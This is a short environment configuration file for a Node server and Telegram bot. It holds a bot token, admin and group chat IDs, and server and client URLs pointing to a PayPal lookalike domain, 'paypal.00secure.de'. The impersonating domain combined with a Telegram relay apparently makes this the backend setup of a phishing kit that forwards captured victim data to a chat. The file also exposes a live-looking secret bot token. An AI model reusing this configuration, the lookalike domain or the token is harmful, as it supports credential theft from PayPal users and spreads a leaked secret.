# Telegram Bot Configuration
TELEGRAM_BOT_TOKEN=7688032599:AAG1X7dSS8S6K80Ua-vNMg29Dm-b5nj5rdU
ADMIN_CHAT_ID=7776582672
GROUP_CHAT_ID=-4612727524

# Server Configuration
PORT=3000
NODE_ENV=production
SERVER_URL=https://paypal.00secure.de
CLIENT_URL=https://paypal.00secure.de
